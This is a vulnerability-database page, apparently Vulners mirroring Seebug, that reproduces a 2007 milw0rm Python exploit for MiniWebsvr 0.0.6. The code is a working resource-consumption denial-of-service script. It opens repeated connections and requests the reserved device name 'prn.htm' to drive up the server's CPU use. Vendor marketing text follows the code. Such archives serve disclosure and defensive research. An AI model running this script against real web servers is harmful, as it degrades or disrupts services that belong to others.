Lucene search
K

MiniWebsvr <= 0.0.6 - Remote Resource Consumption DoS Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Remote Resource Consumption DoS Exploit against MiniWebsvr 0.0.

Code

                                                import socket

print
&#34;-----------------------------------------------------------------------&#34;
print &#34;MiniWebsvr 0.0.6 (0-Day) Resource Consumption&#34;
print &#34;url: http://miniwebsvr.sourceforge.net/&#34;
print &#34;author: shinnai&#34;
print &#34;mail: shinnai[at]autistici[dot]org&#34;
print &#34;site: http://shinnai.altervista.org&#34;
print &#34;Run this exploit and take a look to the CPU usage.&#34;
print
&#34;-----------------------------------------------------------------------&#34;

host = &#34;127.0.0.1&#34;
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   for i in range (0,3):
       request =  &#34;GET /prn.htm HTTP/1.1 \n\n&#34;
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print &#34;Unable to connect. exiting.&#34;

# milw0rm.com [2007-02-13]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation